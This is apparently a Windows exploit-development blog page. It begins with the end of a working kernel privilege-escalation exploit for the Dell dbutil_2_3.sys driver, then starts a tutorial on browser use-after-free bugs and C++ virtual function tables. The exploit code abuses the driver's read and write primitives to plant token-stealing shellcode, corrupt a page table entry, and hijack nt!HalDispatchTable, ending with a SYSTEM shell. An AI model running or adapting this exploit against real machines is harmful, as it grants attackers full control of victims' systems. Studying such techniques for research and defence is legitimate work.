		// Buffer to send to the driver (read primitive)
		unsigned long long inBuf1[4];

		// Values to send
		unsigned long long one1 = 0x4141414141414141;
		unsigned long long two1 = ntmigetpteAddress;
		unsigned long long three1 = 0x0000000000000000;
		unsigned long long four1 = 0x0000000000000000;

		// Assign the values
		inBuf1[0] = one1;
		inBuf1[1] = two1;
		inBuf1[2] = three1;
		inBuf1[3] = four1;

		// Interact with the driver
		DWORD bytesReturned1 = 0;

		BOOL interact = DeviceIoControl(
			driverHandle,
			IOCTL_READ_CODE,
			&inBuf1,
			sizeof(inBuf1),
			&inBuf1,
			sizeof(inBuf1),
			&bytesReturned1,
			NULL
		);

		// Error handling
		if (!interact)
		{
			printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
			exit(-1);
		}
		else
		{
			// Last member of read array should contain base of the PTEs
			unsigned long long pteBase = inBuf1[3];

			printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

			// .data section of dbutil_2_3.sys contains a code cave
			unsigned long long shellcodeLocation = driverBase + 0x3010;

			// Bitwise operations to locate PTE of shellcode page
			unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
			shellcodePte = shellcodePte & 0x7FFFFFFFF8;
			shellcodePte = shellcodePte + pteBase;

			// Print update
			printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

			// Buffer to send to the driver (read primitive)
			unsigned long long inBuf2[4];

			// Values to send
			unsigned long long one2 = 0x4141414141414141;
			unsigned long long two2 = shellcodePte;
			unsigned long long three2 = 0x0000000000000000;
			unsigned long long four2 = 0x0000000000000000;

			inBuf2[0] = one2;
			inBuf2[1] = two2;
			inBuf2[2] = three2;
			inBuf2[3] = four2;

			// Parameter for DeviceIoControl
			DWORD bytesReturned2 = 0;

			BOOL interact1 = DeviceIoControl(
				driverHandle,
				IOCTL_READ_CODE,
				&inBuf2,
				sizeof(inBuf2),
				&inBuf2,
				sizeof(inBuf2),
				&bytesReturned2,
				NULL
			);

			// Error handling
			if (!interact1)
			{
				printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
				exit(-1);
			}
			else
			{
				// Last member of read array should contain PTE bits
				unsigned long long pteBits = inBuf2[3];

				printf("[+] PTE bits for the shellcode page: 0x%llx\n", pteBits);

				/*
					; Windows 10 1903 x64 Token Stealing Payload
					; Author Connor McGarr

					[BITS 64]

					_start:
						mov rax, [gs:0x188]		  ; Current thread (_KTHREAD)
						mov rax, [rax + 0xb8]	  ; Current process (_EPROCESS)
						mov rbx, rax			  ; Copy current process (_EPROCESS) to rbx
					__loop:
						mov rbx, [rbx + 0x2f0] 	  ; ActiveProcessLinks
						sub rbx, 0x2f0		   	  ; Go back to current process (_EPROCESS)
						mov rcx, [rbx + 0x2e8] 	  ; UniqueProcessId (PID)
						cmp rcx, 4 				  ; Compare PID to SYSTEM PID
						jnz __loop			      ; Loop until SYSTEM PID is found

						mov rcx, [rbx + 0x360]	  ; SYSTEM token is @ offset _EPROCESS + 0x360
						and cl, 0xf0			  ; Clear out _EX_FAST_REF RefCnt
						mov [rax + 0x360], rcx	  ; Copy SYSTEM token to current process

						xor rax, rax			  ; set NTSTATUS STATUS_SUCCESS
						ret						  ; Done!

				*/

				// One QWORD arbitrary write
				// Shellcode is 67 bytes, which rounds up to 9 unsigned long longs (72 bytes, zero-padded)
				unsigned long long shellcode1 = 0x00018825048B4865;
				unsigned long long shellcode2 = 0x000000B8808B4800;
				unsigned long long shellcode3 = 0x02F09B8B48C38948;
				unsigned long long shellcode4 = 0x0002F0EB81480000;
				unsigned long long shellcode5 = 0x000002E88B8B4800;
				unsigned long long shellcode6 = 0x8B48E57504F98348;
				unsigned long long shellcode7 = 0xF0E180000003608B;
				unsigned long long shellcode8 = 0x4800000360888948;
				unsigned long long shellcode9 = 0x0000000000C3C031;

				// Buffers to send to the driver (write primitive)
				unsigned long long inBuf3[4];
				unsigned long long inBuf4[4];
				unsigned long long inBuf5[4];
				unsigned long long inBuf6[4];
				unsigned long long inBuf7[4];
				unsigned long long inBuf8[4];
				unsigned long long inBuf9[4];
				unsigned long long inBuf10[4];
				unsigned long long inBuf11[4];

				// Values to send
				unsigned long long one3 = 0x4141414141414141;
				unsigned long long two3 = shellcodeLocation;
				unsigned long long three3 = 0x0000000000000000;
				unsigned long long four3 = shellcode1;

				unsigned long long one4 = 0x4141414141414141;
				unsigned long long two4 = shellcodeLocation + 0x8;
				unsigned long long three4 = 0x0000000000000000;
				unsigned long long four4 = shellcode2;

				unsigned long long one5 = 0x4141414141414141;
				unsigned long long two5 = shellcodeLocation + 0x10;
				unsigned long long three5 = 0x0000000000000000;
				unsigned long long four5 = shellcode3;

				unsigned long long one6 = 0x4141414141414141;
				unsigned long long two6 = shellcodeLocation + 0x18;
				unsigned long long three6 = 0x0000000000000000;
				unsigned long long four6 = shellcode4;

				unsigned long long one7 = 0x4141414141414141;
				unsigned long long two7 = shellcodeLocation + 0x20;
				unsigned long long three7 = 0x0000000000000000;
				unsigned long long four7 = shellcode5;

				unsigned long long one8 = 0x4141414141414141;
				unsigned long long two8 = shellcodeLocation + 0x28;
				unsigned long long three8 = 0x0000000000000000;
				unsigned long long four8 = shellcode6;

				unsigned long long one9 = 0x4141414141414141;
				unsigned long long two9 = shellcodeLocation + 0x30;
				unsigned long long three9 = 0x0000000000000000;
				unsigned long long four9 = shellcode7;

				unsigned long long one10 = 0x4141414141414141;
				unsigned long long two10 = shellcodeLocation + 0x38;
				unsigned long long three10 = 0x0000000000000000;
				unsigned long long four10 = shellcode8;

				unsigned long long one11 = 0x4141414141414141;
				unsigned long long two11 = shellcodeLocation + 0x40;
				unsigned long long three11 = 0x0000000000000000;
				unsigned long long four11 = shellcode9;

				inBuf3[0] = one3;
				inBuf3[1] = two3;
				inBuf3[2] = three3;
				inBuf3[3] = four3;

				inBuf4[0] = one4;
				inBuf4[1] = two4;
				inBuf4[2] = three4;
				inBuf4[3] = four4;

				inBuf5[0] = one5;
				inBuf5[1] = two5;
				inBuf5[2] = three5;
				inBuf5[3] = four5;

				inBuf6[0] = one6;
				inBuf6[1] = two6;
				inBuf6[2] = three6;
				inBuf6[3] = four6;

				inBuf7[0] = one7;
				inBuf7[1] = two7;
				inBuf7[2] = three7;
				inBuf7[3] = four7;

				inBuf8[0] = one8;
				inBuf8[1] = two8;
				inBuf8[2] = three8;
				inBuf8[3] = four8;

				inBuf9[0] = one9;
				inBuf9[1] = two9;
				inBuf9[2] = three9;
				inBuf9[3] = four9;

				inBuf10[0] = one10;
				inBuf10[1] = two10;
				inBuf10[2] = three10;
				inBuf10[3] = four10;

				inBuf11[0] = one11;
				inBuf11[1] = two11;
				inBuf11[2] = three11;
				inBuf11[3] = four11;

				DWORD bytesReturned3 = 0;
				DWORD bytesReturned4 = 0;
				DWORD bytesReturned5 = 0;
				DWORD bytesReturned6 = 0;
				DWORD bytesReturned7 = 0;
				DWORD bytesReturned8 = 0;
				DWORD bytesReturned9 = 0;
				DWORD bytesReturned10 = 0;
				DWORD bytesReturned11 = 0;

				BOOL interact2 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf3,
					sizeof(inBuf3),
					&inBuf3,
					sizeof(inBuf3),
					&bytesReturned3,
					NULL
				);

				BOOL interact3 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf4,
					sizeof(inBuf4),
					&inBuf4,
					sizeof(inBuf4),
					&bytesReturned4,
					NULL
				);

				BOOL interact4 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf5,
					sizeof(inBuf5),
					&inBuf5,
					sizeof(inBuf5),
					&bytesReturned5,
					NULL
				);

				BOOL interact5 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf6,
					sizeof(inBuf6),
					&inBuf6,
					sizeof(inBuf6),
					&bytesReturned6,
					NULL
				);

				BOOL interact6 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf7,
					sizeof(inBuf7),
					&inBuf7,
					sizeof(inBuf7),
					&bytesReturned7,
					NULL
				);

				BOOL interact7 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf8,
					sizeof(inBuf8),
					&inBuf8,
					sizeof(inBuf8),
					&bytesReturned8,
					NULL
				);

				BOOL interact8 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf9,
					sizeof(inBuf9),
					&inBuf9,
					sizeof(inBuf9),
					&bytesReturned9,
					NULL
				);

				BOOL interact9 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf10,
					sizeof(inBuf10),
					&inBuf10,
					sizeof(inBuf10),
					&bytesReturned10,
					NULL
				);

				BOOL interact10 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf11,
					sizeof(inBuf11),
					&inBuf11,
					sizeof(inBuf11),
					&bytesReturned11,
					NULL
				);

				// A lot of error handling
				if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
				{
					printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
					exit(-1);
				}
				else
				{
					printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

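					// Clear the no-eXecute (NX) bit, which is bit 63 of the PTE
					// Note: this mask clears the top four bits (60-63), not only NX
					unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

					printf("[+] Corrupted PTE bits for the shellcode page: 0x%llx\n", taintedPte);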

					// Clear the no-eXecute bit in the actual PTE
					// Buffer to send to the driver (write primitive)
					unsigned long long inBuf13[4];

					// Values to send
					unsigned long long one13 = 0x4141414141414141;
					unsigned long long two13 = shellcodePte;
					unsigned long long three13 = 0x0000000000000000;
					unsigned long long four13 = taintedPte;

					// Assign the values
					inBuf13[0] = one13;
					inBuf13[1] = two13;
					inBuf13[2] = three13;
					inBuf13[3] = four13;


					// Interact with the driver
					DWORD bytesReturned13 = 0;

					BOOL interact12 = DeviceIoControl(
						driverHandle,
						IOCTL_WRITE_CODE,
						&inBuf13,
						sizeof(inBuf13),
						&inBuf13,
						sizeof(inBuf13),
						&bytesReturned13,
						NULL
					);

					// Error handling
					if (!interact12)
					{
						printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
					}
					else
					{
						printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

						// Offset to nt!HalDispatchTable+0x8
						unsigned long long halDispatch = baseofKernel + 0x427258;

						// Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
						// Buffer to send to the driver (read primitive)
						unsigned long long inBuf14[4];

						// Values to send
						unsigned long long one14 = 0x4141414141414141;
						unsigned long long two14 = halDispatch;
						unsigned long long three14 = 0x0000000000000000;
						unsigned long long four14 = 0x0000000000000000;

						// Assign the values
						inBuf14[0] = one14;
						inBuf14[1] = two14;
						inBuf14[2] = three14;
						inBuf14[3] = four14;

						// Interact with the driver
						DWORD bytesReturned14 = 0;

						BOOL interact13 = DeviceIoControl(
							driverHandle,
							IOCTL_READ_CODE,
							&inBuf14,
							sizeof(inBuf14),
							&inBuf14,
							sizeof(inBuf14),
							&bytesReturned14,
							NULL
						);

						// Error handling
						if (!interact13)
						{
							printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
						}
						else
						{
							// Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
							unsigned long long preservedHal = inBuf14[3];

							printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

							// Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
							// Buffer to send to the driver (write primitive)
							unsigned long long inBuf15[4];

							// Values to send
							unsigned long long one15 = 0x4141414141414141;
							unsigned long long two15 = halDispatch;
							unsigned long long three15 = 0x0000000000000000;
							unsigned long long four15 = shellcodeLocation;

							// Assign the values
							inBuf15[0] = one15;
							inBuf15[1] = two15;
							inBuf15[2] = three15;
							inBuf15[3] = four15;

							// Interact with the driver
							DWORD bytesReturned15 = 0;

							BOOL interact14 = DeviceIoControl(
								driverHandle,
								IOCTL_WRITE_CODE,
								&inBuf15,
								sizeof(inBuf15),
								&inBuf15,
								sizeof(inBuf15),
								&bytesReturned15,
								NULL
							);

							// Error handling
							if (!interact14)
							{
								printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
							}
							else
							{
								printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

								// Locating nt!NtQueryIntervalProfile
								NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
									GetModuleHandle(
										TEXT("ntdll.dll")),
									"NtQueryIntervalProfile"
								);

								// Error handling
								if (!NtQueryIntervalProfile)
								{
									printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: 0x%lx\n", GetLastError());
									exit(1);
								}
								else
								{
									// Print update for found ntdll!NtQueryIntervalProfile
									printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", (unsigned long long)NtQueryIntervalProfile);

									// Calling nt!NtQueryIntervalProfile
									ULONG exploit = 0;

									NtQueryIntervalProfile(
										0x1234,
										&exploit
									);

									// Restoring nt!HalDispatchTable+0x8
									// Buffer to send to the driver (write primitive)
									unsigned long long inBuf16[4];

									// Values to send
									unsigned long long one16 = 0x4141414141414141;
									unsigned long long two16 = halDispatch;
									unsigned long long three16 = 0x0000000000000000;
									unsigned long long four16 = preservedHal;

									// Assign the values
									inBuf16[0] = one16;
									inBuf16[1] = two16;
									inBuf16[2] = three16;
									inBuf16[3] = four16;

									// Interact with the driver
									DWORD bytesReturned16 = 0;

									BOOL interact15 = DeviceIoControl(
										driverHandle,
										IOCTL_WRITE_CODE,
										&inBuf16,
										sizeof(inBuf16),
										&inBuf16,
										sizeof(inBuf16),
										&bytesReturned16,
										NULL
									);

									// Error handling
									if (!interact15)
									{
										printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
									}
									else
									{
										printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
										printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

										// Spawning an NT AUTHORITY\SYSTEM shell
										system("cmd.exe /c cmd.exe /K cd C:\\");
									}
								}
							}
						}
					}
				}
			}
		}
	}
}

// Call exploitWork()
int main(void)
{
	exploitWork();
	return 0;
}

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00

Introduction

Browser exploitation is a topic that has been incredibly daunting for me. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember waking up one day and realizing that I needed to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel. Not only do you need to understand the overarching exploit primitives and vulnerability classes that are specific to Windows, you also need to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. The addition of browser-specific mitigations has also been a determining factor in my putting off learning this subject.

What has always been frightening is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for me. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and then attempt to answer that question. In addition, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first walkthrough for me.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As mentioned above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented and fairly common. There are great explanations out there, but for completeness’ sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory is allocated by the heap manager. A chunk is just a contiguous piece of memory, like a buffer, made up of blocks, and on x86 systems each block is 0x8 bytes, or 2 DWORDs. Don’t over-think them. On Windows the heap manager consists of the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in a future section. At some point during the program’s lifetime, this previously allocated chunk of memory is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager to service future allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If you dereferenced the address 0x15000, you could expect to see 0x41s (this is pseudo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), provided the address hasn’t been used to service any new allocation requests and is still in a free state.

Where the vulnerability comes in is that the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although it is in a “free” state. This usually causes some sort of exception, resulting in a program crash, as the program is attempting to access and/or dereference memory that simply isn’t valid anymore.
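To make the 0x15000 example a bit more concrete, here is a minimal sketch of the same idea. It assumes a made-up fixed-size pool (ToyPool, kSlotSize, kSlotCount, and staleReadAfterReuse are names I invented for illustration) rather than the real Windows heap manager, and it never actually hands memory back to the OS, so nothing here crashes. The only point it shows is that a pointer kept around after a free can end up observing whatever the next allocation wrote there.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>

// Hypothetical toy allocator: one pool of fixed-size 0x40-byte slots.
// It only models "freed memory gets handed out again"; it is NOT how the
// Windows heap manager is implemented.
constexpr std::size_t kSlotSize = 0x40;
constexpr std::size_t kSlotCount = 4;

struct ToyPool {
    unsigned char storage[kSlotCount][kSlotSize] = {};
    bool inUse[kSlotCount] = {};

    // Hand out the first free slot, or nullptr if the pool is exhausted.
    unsigned char* allocate() {
        for (std::size_t i = 0; i < kSlotCount; ++i) {
            if (!inUse[i]) {
                inUse[i] = true;
                return storage[i];
            }
        }
        return nullptr;
    }

    // Mark the slot as free again. The caller's pointer is NOT cleared.
    void release(unsigned char* slot) {
        for (std::size_t i = 0; i < kSlotCount; ++i) {
            if (storage[i] == slot) {
                inUse[i] = false;
            }
        }
    }
};

// Returns the byte a stale pointer observes after its slot has been reused.
unsigned char staleReadAfterReuse() {
    ToyPool pool;

    unsigned char* first = pool.allocate();    // our pretend allocation
    assert(first != nullptr);
    std::memset(first, 0x41, kSlotSize);       // fill it with 0x41 bytes

    pool.release(first);                       // freed, but 'first' still dangles

    unsigned char* second = pool.allocate();   // the same slot is handed out again
    assert(second == first);
    std::memset(second, 0x42, kSlotSize);      // the new owner writes its own data

    return first[0];                           // the stale pointer now sees 0x42
}
```

Calling staleReadAfterReuse() returns 0x42 rather than the 0x41 that was originally written, because the stale pointer and the new allocation refer to the same slot.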

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed from within the class itself (derived classes cannot reach them unless they are declared protected or public). We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
	public:

		// This is our user defined constructor
		classOne()
		{
			cout << "Hello from the classOne constructor" << endl;
		}

		// This is our user defined destructor
		~classOne()
		{
			cout << "Hello from the classOne destructor!" << endl;
		}

	public:
		virtual void sharedFunction(){};				// Prototype a virtual function
		virtual void sharedFunction1(){};				// Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
	public:

		// This is our user defined constructor
		classTwo()
		{
			cout << "Hello from the classTwo constructor!" << endl;
		};

		// This is our user defined destructor
		~classTwo()
		{
			cout << "Hello from the classTwo destructor!" << endl;
		};

	public:
		void sharedFunction() 							
		{
			cout << "Hello from the classTwo sharedFunction()!" << endl;		// Create A DIFFERENT function definition of sharedFunction()
		};

		void sharedFunction1()
		{
			cout << "Hello from the classTwo sharedFunction1()!" << endl;		// Create A DIFFERENT function definition of sharedFunction1()
		};
};

// This is another derived/sub class
class classThree : public classOne
{
	public:

		// This is our user defined constructor
		classThree()
		{
			cout << "Hello from the classThree constructor" << endl;
		};

		// This is our user defined destructor
		~classThree()
		{
			cout << "Hello from the classThree destructor!" << endl;
		};
	
	public:
		void sharedFunction()
		{
			cout << "Hello from the classThree sharedFunction()!" << endl; 	// Create A DIFFERENT definition of sharedFunction()
		};

		void sharedFunction1()
		{
			cout << "Hello from the classThree sharedFunction1()!" << endl; 	// Create A DIFFERENT definition of sharedFunction1()
		};
};

// Main function
int main()
{
	// Create an instance of the base/main class and set it to one of the derivative classes
	// Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
	// The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	// Invoke the virtual functions
	c1->sharedFunction();
	c1_2->sharedFunction();
	c1->sharedFunction1();
	c1_2->sharedFunction1();

	// Destructors are called when the object is explicitly destroyed with delete
	delete c1;
	delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor has the same name as its class. So, for instance, the constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Their general purpose is to initialize the variables within a class whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating pointers to classOne objects, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* c1 = new classTwo in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is called whenever the lifetime of a class object ends. This could be an object going out of scope or, as in our case, the delete operator being invoked against one of the previously created class objects (c1 and c1_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being destroyed. Note that a destructor does not have a return type, does not accept function arguments, and does not return a value.
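As a small aside, the ordering of constructors and destructors can be sketched as follows. This is a minimal example under my own assumptions: Base, Derived, lifetimeLog, and recordLifetime are hypothetical names that do not appear in virtualfunctions.exe, and the object lives on the stack instead of being created with new. It records each constructor and destructor call so the order can be inspected afterwards.

```cpp
#include <cassert>
#include <string>
#include <vector>

// Hypothetical names (Base, Derived, lifetimeLog) used only for illustration.
std::vector<std::string> lifetimeLog;

struct Base {
    Base()  { lifetimeLog.push_back("Base ctor"); }
    ~Base() { lifetimeLog.push_back("Base dtor"); }
};

struct Derived : Base {
    Derived()  { lifetimeLog.push_back("Derived ctor"); }
    ~Derived() { lifetimeLog.push_back("Derived dtor"); }
};

// Creates and destroys one Derived object and returns the recorded events.
std::vector<std::string> recordLifetime() {
    lifetimeLog.clear();
    {
        Derived object;   // constructors run here: Base first, then Derived
    }                     // leaving the scope runs the destructors in reverse order
    assert(lifetimeLog.size() == 4);
    return lifetimeLog;
}
```

The returned log reads "Base ctor", "Derived ctor", "Derived dtor", "Base dtor": the base class is constructed first and destroyed last.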

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
	int var1;
	int var2;
};

As you know, the first member of this struct is int var1. The same holds true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.
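Here is a rough sketch of what a member function looks like next to plain data members. The types Counter and PlainPair, and the helper counterAfterTwoIncrements, are hypothetical and only exist for this illustration. It also shows the default access difference: members of a class are private until stated otherwise, while members of a struct are public.

```cpp
#include <cassert>

// Hypothetical example types; the names and members are illustrative only.
class Counter {
    int count = 0;   // no access specifier yet, so this is private in a class

public:
    void increment() { ++count; }         // member function that modifies a data member
    int value() const { return count; }   // member function that reads a data member
};

struct PlainPair {
    int var1 = 0;   // members of a struct are public by default
    int var2 = 0;

    int sum() const { return var1 + var2; }   // a struct can hold member functions too
};

// Uses only the public member functions, since 'count' itself is not reachable here.
int counterAfterTwoIncrements() {
    Counter counter;
    counter.increment();
    counter.increment();
    assert(counter.value() == 2);
    return counter.value();
}
```

Outside of Counter, writing counter.count would not compile, whereas pair.var1 on a PlainPair is perfectly fine.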

The reason virtual functions exist is that they allow a developer to prototype a function in a main class and then redefine that function in a derivative class. This works because the derivative class inherits all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, repeated here for convenience: classOne* c1 = new classTwo;. This creates an object of the derivative class classTwo and stores its address in a classOne pointer (c1). Virtual functions ensure that whenever a function is called through that pointer (e.g. c1), the definition that runs is the correct one for the actual class of the object. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.
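To see why the virtual keyword matters, here is a minimal sketch that contrasts a virtual function with a non-virtual one of the same shape. Shape, Circle, name(), kind(), and the helper functions are hypothetical names I picked for the illustration, and they are not part of virtualfunctions.exe. Both calls go through a reference to the base class, which is the same situation as calling through classOne* c1.

```cpp
#include <cassert>
#include <string>

// Hypothetical classes used only to contrast virtual and non-virtual calls.
struct Shape {
    virtual ~Shape() = default;
    virtual std::string name() const { return "Shape"; }   // virtual: resolved at run time
    std::string kind() const { return "Shape"; }           // non-virtual: resolved at compile time
};

struct Circle : Shape {
    std::string name() const override { return "Circle"; } // redefines the virtual function
    std::string kind() const { return "Circle"; }          // merely hides Shape::kind
};

// Both helpers only know about the base class type.
std::string callVirtual(const Shape& shape)    { return shape.name(); }
std::string callNonVirtual(const Shape& shape) { return shape.kind(); }

// Small self-check that can be called from main().
void checkDispatch() {
    Circle circle;
    assert(callVirtual(circle) == "Circle");     // the object's real class decides
    assert(callNonVirtual(circle) == "Shape");   // the static type of the reference decides
}
```

The virtual call reaches the Circle definition even though the caller only sees a Shape, while the non-virtual call is stuck with the Shape version.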

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested in the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C++ code, and will walk through the code as you step through it.

In WinDbg, step through the code with t until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

